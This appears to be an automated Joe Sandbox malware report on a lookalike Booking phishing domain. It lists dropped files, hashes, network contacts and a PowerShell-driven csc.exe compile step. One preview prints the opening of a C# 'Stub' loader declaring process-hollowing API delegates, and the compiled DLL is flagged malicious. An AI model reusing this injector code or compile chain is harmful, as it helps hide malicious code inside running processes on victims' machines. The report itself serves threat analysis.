                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                                                                        high
IP
192.168.2.17
192.168.2.23
127.0.0.1

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1651034
Start date and time: 2025-03-28 11:26:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                        Sample URL:http://roombedsrewiews.com
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:23
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        Analysis Mode:stream
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.phis.expl.evad.win@33/22@29/137
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.251.40.142, 142.251.32.99, 172.253.122.84, 142.251.32.110, 4.175.87.197
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: http://roombedsrewiews.com
                                                                                                                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):10440
                                                                                                                                                                                                                        Entropy (8bit):6.124440030336735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4069403CCA2F004EBEAB52791A33BADC
                                                                                                                                                                                                                        SHA1:10721205C95806F9CA3FDDCE4697BDEAF7393D9D
                                                                                                                                                                                                                        SHA-256:DFA6CB6EE7B35026D87257216E75298774E172E736792557F9752B783CA335F6
                                                                                                                                                                                                                        SHA-512:D1FAA5904632133D9A78C1D3E0080F42E63450C3BDC4789A9CB24B868F0AC0F04082A1D076ADFBC64D42EE29C97ECC07B321DDC731C4FD8B740ED74FFAEEE4B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15908
                                                                                                                                                                                                                        Entropy (8bit):5.422430575114955
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:B1B01D592117C6A8CE8460205A3F6981
                                                                                                                                                                                                                        SHA1:8B7882C1E95610812D591B90863059B2F2E2C152
                                                                                                                                                                                                                        SHA-256:7D7EF79B8EF7DBB95ECBCC7D1F75A3A8B41778679DC2782AFCE228DE75AF4597
                                                                                                                                                                                                                        SHA-512:A24E4DF1045EBF0F02FE632F1219BC895BC07009EC8DEC5F93EFBB9DB0810C7C52C815C870DE90DD1EBBC3B06C47E9B396ABC02F0DA26F3E4543D0D74E5D9A90
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                        Entropy (8bit):3.0948299029066915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:F49C888C75E2471B5848EF9F9943ACE1
                                                                                                                                                                                                                        SHA1:AB986427F35C25FE941D34B670B666DBE2CAF0BC
                                                                                                                                                                                                                        SHA-256:6693C2CA10D8BDBA6E3FE435519586020311DE552B3ADD12A1A1D13AC108BFFD
                                                                                                                                                                                                                        SHA-512:31FD07DF3690BFCFFC69E2EEE20BD52B54D9266C94CD3F58D2A8D30EFC706565F4973FE5B0772B591040E6B62844FF326BB5887E376C7D84CD517A94A682E186
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Fri Mar 28 11:44:21 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                        Entropy (8bit):3.9732801196501164
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:AAC65609458C3DDDC10EC7B5D6A08301
                                                                                                                                                                                                                        SHA1:961F6F392D57DB1BBB1EA39A12855FD13F50A703
                                                                                                                                                                                                                        SHA-256:1177A5DB670EA2C685BCDC693BE05062CEE66897DE001545FF097268D2C1EFC3
                                                                                                                                                                                                                        SHA-512:E7D10A01D79CFBACC1DB5A976226E8ABE8B7F51EA5A46872B8F2AE98F3A1F225A06DAA04774A9CA4A9757E639F362C91A867764D6F74439A33638156D02C8C48
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9122
                                                                                                                                                                                                                        Entropy (8bit):4.613031027327575
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
                                                                                                                                                                                                                        SHA1:48221936B98AAC14EAD7C4589513D074365414EC
                                                                                                                                                                                                                        SHA-256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
                                                                                                                                                                                                                        SHA-512:19C28B5AF8E4243350EE13C423FD066CEF969A5C86DE5F7B2AC4E4FBF75FDA17E82A6A91FBD6034786B9BEEE77E2EB4B1CECD1CF0B901E2874B88DA3E338845E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.using System.Diagnostics;..using System.Runtime.InteropServices;..using System;....namespace Stub..{.. public static class Look.. {.. #region API delegate.. private delegate int ResumeThreadHandler(IntPtr handle);.. private delegate bool SetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool SetThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetThreadContextHandler(IntPtr thread, int[] context);.. private delegate int VirtualAllocExHandler(IntPtr handle, int address, int length, int type, int protect);.. private delegate bool WriteMemoryHandler(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);.. private delegate bool ReadMemoryHandler(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);.. private delegate
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):188
                                                                                                                                                                                                                        Entropy (8bit):4.889540526675411
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:93810766A0174826610F30F1054A0FA5
                                                                                                                                                                                                                        SHA1:A1D211E163DB15DCB96119AEBDC72992F883C837
                                                                                                                                                                                                                        SHA-256:CC17644435C926B0B5B3554E9EF5DBF75181F8256D21CCFF64BA36545B5A02DD
                                                                                                                                                                                                                        SHA-512:E2F0B9548F00F82107A6F31633506B2D12E3C42FAD8E5419D01E58E4DF05226D3F51384F0466B68CF96B0E5A8E90DA2ABF0B845613CB28A8F47D4A16ECD1F313
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\toaudqqy.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\toaudqqy.0.cs"
                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8704
                                                                                                                                                                                                                        Entropy (8bit):4.523940267980384
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:52EDBB6DF296F754078CE2C6CA87C760
                                                                                                                                                                                                                        SHA1:CC4334FB822C9DC3CE82B53DFE62312A3265FACF
                                                                                                                                                                                                                        SHA-256:029FA9C45CA5F2D67C4A8E6AD518A9C3F46D75901A411A1995E3669491CEFCBF
                                                                                                                                                                                                                        SHA-512:F7191F9AF4A0E4AD6A061C720D61C13B6ED1E9238028698DA74CC6BD4893EBE4AB731F2ABCC78FB49270BCDF860F9570194A9865AF9682A4EF013BDC4AF84F21
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):685
                                                                                                                                                                                                                        Entropy (8bit):5.231008344503757
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:187C1CDAE097A01CC3645096A6205511
                                                                                                                                                                                                                        SHA1:F5F42680039E2AEC1C202F9408AED07CD8F7C852
                                                                                                                                                                                                                        SHA-256:9207ABCC751252AE55B058A15EBD4D8AE7D91D11399282758FC186588719FBE8
                                                                                                                                                                                                                        SHA-512:52BA91D30E867BE5FA0C6DBC14D8D7F49E407022684ABB352B499834E27E69D8EDFAE38EF7F9095AC9B85F9508338AF59ED7710D225400DCA93AD9D27F8B277B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\toaudqqy.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\toaudqqy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):0
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:319E93DDE7A8875B922283D288402CA5
                                                                                                                                                                                                                        SHA1:B2BFD5D37D0CED163666E3AD6BD22274391B806E
                                                                                                                                                                                                                        SHA-256:8877B37E866CA9C3AD8CDA8E03ACDED9EACEAD49A041004158AC39AF11678A1B
                                                                                                                                                                                                                        SHA-512:52D036B3763C14B97318A05C149823290338B729DA7E394477BEA6FDF2FAE7183568F02BC6DF8B570C5A1ECED89F24679B3923ECFC4179B66954F701652FD7DA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6222
                                                                                                                                                                                                                        Entropy (8bit):3.7201706192434236
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:319E93DDE7A8875B922283D288402CA5
                                                                                                                                                                                                                        SHA1:B2BFD5D37D0CED163666E3AD6BD22274391B806E
                                                                                                                                                                                                                        SHA-256:8877B37E866CA9C3AD8CDA8E03ACDED9EACEAD49A041004158AC39AF11678A1B
                                                                                                                                                                                                                        SHA-512:52D036B3763C14B97318A05C149823290338B729DA7E394477BEA6FDF2FAE7183568F02BC6DF8B570C5A1ECED89F24679B3923ECFC4179B66954F701652FD7DA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7002)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):8833
                                                                                                                                                                                                                        Entropy (8bit):5.4976151392899375
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:892B75BF33DA3C91B96FE0FD747C239F
                                                                                                                                                                                                                        SHA1:9D5D8DC8E83866B111EF4007D6149648145478B9
                                                                                                                                                                                                                        SHA-256:5E7F3E706AF7992596EEF3D665900C6CE8438C4654D6E6CC67B84CD01945F1EE
                                                                                                                                                                                                                        SHA-512:9211C162577C91DC005B15767A3189E9520CDB1CC9F2213CF98669D4A339FD9E9F6250B7337127FDBCDC24BEEB4DD7DD06E3442312969F0234E66B5FD4422EB2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com/SIE/?Q_ZID=ZN_3Eum1ldyL0aIh0i
                                                                                                                                                                                                                        Preview:(function () {. if (typeof window.QSI === 'undefined'){. window.QSI = {};. }.. var tempQSIConfig = {"hostedJSLocation":"https://siteintercept.qualtrics.com/dxjsmodule/","baseURL":"https://siteintercept.qualtrics.com","surveyTakingBaseURL":"https://s.qualtrics.com/spoke/all/jam","BrandTier":"RQqcwhV2J1","zoneId":"ZN_3Eum1ldyL0aIh0i"};.. // If QSI.config is defined in snippet, merge with QSIConfig from orchestrator-handler.. if (typeof window.QSI.config !== 'undefined' && typeof window.QSI.config === 'object') {. // This merges the user defined QSI.config with the handler defined QSIConfig. // If both objects have a property with the same name,. // then the second object property overwrites the first.. for (var attrname in tempQSIConfig) { window.QSI.config[attrname] = tempQSIConfig[attrname]; }. } else {. window.QSI.config = tempQSIConfig;. }.. window.QSI.shouldStripQueryParamsInQLoc = false;.})();../*@preserve.***Version
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2228
                                                                                                                                                                                                                        Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):548
                                                                                                                                                                                                                        Entropy (8bit):4.688532577858027
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                                                                                                                                        SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                                                                                                                                        SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                                                                                                                                        SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://booking.roombedsrewiews.com/static/OtAutoBlock.js
                                                                                                                                                                                                                        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):11374
                                                                                                                                                                                                                        Entropy (8bit):5.519922580947287
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:756F9116836F579D12BE8FE786B69D98
                                                                                                                                                                                                                        SHA1:51FF48AEEDDC311585DA9D749DB091900E9B9F02
                                                                                                                                                                                                                        SHA-256:DEA9DF0145848FFEB3C6931228D41E833341B4837C0E713D321C5BFCF6DCD4E6
                                                                                                                                                                                                                        SHA-512:6249596F8554AAEBB74B76EFE3138C1109CC87B2C72A4FFE0C1869EE77155A05C58F4B2D966BA38775C35A2B4451FF2581A22F8098ACF1377F6F0C15CB6C20B5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://munchkin.marketo.net/164/munchkin.js
                                                                                                                                                                                                                        Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 164 r924. */. (function(l){if(!l.MunchkinTracker){var h=l.document,p=h.location,C=encodeURIComponent,y=!1,q=null,t=null,D=!1,v=null,E=[],u=function(b,a,c,d){try{var e=function(){try{c.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,d||!1):b.attachEvent&&b.attachEvent("on"+a,e);E.push([b,a,e,d])}catch(f){}},U=function(b,a,c,d){try{b.removeEventListener?b.removeEventListener(a,c,d||!1):b.detachEvent&&b.detachEvent("on"+a,c)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==.b},F=function(b,a){return b.className.match(RegExp("(\\s|^)"+a+"(\\s|$)"))},V=e(l.XMLHttpRequest)&&e((new l.XMLHttpRequest).withCredentials),s=function(b){var a=null,c;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(d){c=b.indexOf("?");if(-1!==c)t
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1251
                                                                                                                                                                                                                        Entropy (8bit):5.433406739187698
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0C131DE2A0D8F1BA69EAB7F6866C84DD
                                                                                                                                                                                                                        SHA1:362DB4E022D246B6A86C1A1C54E553C6D5F04ED6
                                                                                                                                                                                                                        SHA-256:081AD4206BFEB1950C8382B5BC32AAC31C4698598563D87080EE67A8FC5318D0
                                                                                                                                                                                                                        SHA-512:A8E0ADF432B95A438CA864D087830C697512675D2CA6E8D29225BBB36B8126F0B32E74CA264F40D0EEA34740D0618921E2B169857368DD1D725946AC55DECF73
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                                                                        Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: prod r946. */. (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"164"},g=[],m=function(){if(!k){for(;0<e.length;){var f=e.shift();b.MunchkinTracker[f[0]].apply(b.MunchkinTracker,f[1])}k=!0}},n=function(f){var a=c.createElement("script"),b=c.getElementsByTagName("base")[0]||c.getElementsByTagName("script")[0];a.type="text/javascript";a.async=!0;a.src=f;a.onreadystatechange=function(){"complete"!==this.readyState&&"loaded"!==this.readyState||m()};a.onload=m;b.parentNode.insertBefore(a,b)},h={CLICK_LINK:"CLICK_LINK",.VISIT_WEB_PAGE:"visitWebPage",init:function(b){var a;a=l[b];if(!a&&0<g.length){a=b;var c=0,d;if(0!==a.length)for(d=0;d<a.length;d+=1)c+=a.charCodeAt(d);a=g[c%g.length]}a||(a=l.fallback);e.push(["init",arguments]);"150"===a?n("//munchkin-cdn.marketo.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (64779)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):81484
                                                                                                                                                                                                                        Entropy (8bit):5.317084415140397
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:AD155B597A8C5A1556951905826E5A89
                                                                                                                                                                                                                        SHA1:157521878FC1D2F24916940B28BFE5D2D6FD07C6
                                                                                                                                                                                                                        SHA-256:1BE8A940EA6B760E87EAFCA7B0C3AD6CBBD239A5F5418EF755E2FDF122707CDF
                                                                                                                                                                                                                        SHA-512:01E460CDE1837F01F53D9C0B1761B2BF5080077F34B921A2A9A994678C43E44C6B8E1748AE0BC702DE20001512894904019426132004D881A85D636916D1061E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/8.7128e66c4069227926d7.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=booking.roombedsrewiews.com
                                                                                                                                                                                                                        Preview:./*@preserve.***Version 2.27.0***.*/../*@license. * Copyright 2002 - 2018 Qualtrics, LLC.. * All rights reserved.. *. * Notice: All code, text, concepts, and other information herein (collectively, the. * "Materials") are the sole property of Qualtrics, LLC, except to the extent. * otherwise indicated. The Materials are proprietary to Qualtrics and are protected. * under all applicable laws, including copyright, patent (as applicable), trade. * secret, and contract law. Disclosure or reproduction of any Materials is strictly. * prohibited without the express prior written consent of an authorized signatory. * of Qualtrics. For disclosure requests, please contact notice@qualtrics.com.. */..try {. (window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]=window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]||[]).push([[8],{17:function(e,t,n){"use strict";n.d(t,"a",(function(){return i})),n.d(t,"e",(function(){return r})),n.d(t,"f",(function(){return
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):87533
                                                                                                                                                                                                                        Entropy (8bit):5.262536918435756
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                                                                                                                        SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                                                                                                                        SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                                                                                                                        SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.7.1.min.js
